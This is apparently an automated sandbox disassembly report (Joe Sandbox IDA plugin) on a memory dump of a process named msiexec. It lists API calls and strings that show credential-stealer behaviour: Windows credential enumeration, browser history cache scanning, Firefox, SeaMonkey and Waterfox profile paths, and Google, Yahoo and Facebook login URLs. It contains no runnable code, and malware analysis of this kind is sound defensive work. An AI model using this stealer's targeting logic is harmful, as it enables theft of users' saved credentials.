                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                • API String ID: 2941347001-70141382
                                                                                                                                                • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                                                • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                                                • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                                                                                Control-flow Graph

                                                                                                                                                 • Control-flow graph of the function at 004466F4 (rendered graph image not preserved in this text export)
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2827331108-0
                                                                                                                                                • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040C298
                                                                                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                                                                • String ID: visited:
                                                                                                                                                • API String ID: 1157525455-1702587658
                                                                                                                                                • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                • free.MSVCRT ref: 0040E28B
                                                                                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                • API String ID: 2804212203-2982631422
                                                                                                                                                • Opcode ID: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                                                                                                                • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                • Opcode Fuzzy Hash: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                                                                                                                • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                  • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                • memset.MSVCRT ref: 0040BC75
                                                                                                                                                • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                                                                • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 115830560-3916222277
                                                                                                                                                • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                • API String ID: 2936932814-4196376884
                                                                                                                                                • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                • memset.MSVCRT ref: 0040BE91
                                                                                                                                                • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 697348961-0
                                                                                                                                                • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00403CBF
• memset.MSVCRT ref: 00403CD4
• memset.MSVCRT ref: 00403CE9
• memset.MSVCRT ref: 00403CFE
• memset.MSVCRT ref: 00403D13
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 00403DDA
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
• String ID: Waterfox$Waterfox\Profiles
• API String ID: 1829478387-11920434
• Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
• Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
• Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
• Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
APIs
• memset.MSVCRT ref: 00403E50
• memset.MSVCRT ref: 00403E65
• memset.MSVCRT ref: 00403E7A
• memset.MSVCRT ref: 00403E8F
• memset.MSVCRT ref: 00403EA4
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 00403F6B
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
• String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
• API String ID: 1829478387-2068335096
• Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
• Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
• Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
• Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
APIs
• memset.MSVCRT ref: 00403FE1
• memset.MSVCRT ref: 00403FF6
• memset.MSVCRT ref: 0040400B
• memset.MSVCRT ref: 00404020
• memset.MSVCRT ref: 00404035
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 004040FC
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
• String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
• API String ID: 1829478387-3369679110
• Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
• Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
• Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
• Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
APIs
• memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy
• String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
• API String ID: 3510742995-2641926074
• Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
• Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
• Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
• Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
APIs
• CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
• GetLastError.KERNEL32 ref: 0041847E
• free.MSVCRT ref: 0041848B
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: CreateErrorFileLastfree
• String ID: |A
• API String ID: 981974120-1717621600
• Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
• Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
• Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
• Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
APIs
  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
• memset.MSVCRT ref: 004033B7
• memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
• wcscmp.MSVCRT ref: 004033FC
• _wcsicmp.MSVCRT ref: 00403439
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
• String ID: $0.@
• API String ID: 2758756878-1896041820
• Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
• Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
• Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
• Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID:
• API String ID: 2941347001-0
• Opcode ID: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
• Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
• Opcode Fuzzy Hash: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
• Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
APIs
                                                                                                                                                • memset.MSVCRT ref: 00403C09
                                                                                                                                                • memset.MSVCRT ref: 00403C1E
                                                                                                                                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memsetwcscat$wcscpywcslen
                                                                                                                                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                • API String ID: 2489821370-1174173950
                                                                                                                                                • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040A824
                                                                                                                                                • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 669240632-0
                                                                                                                                                • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
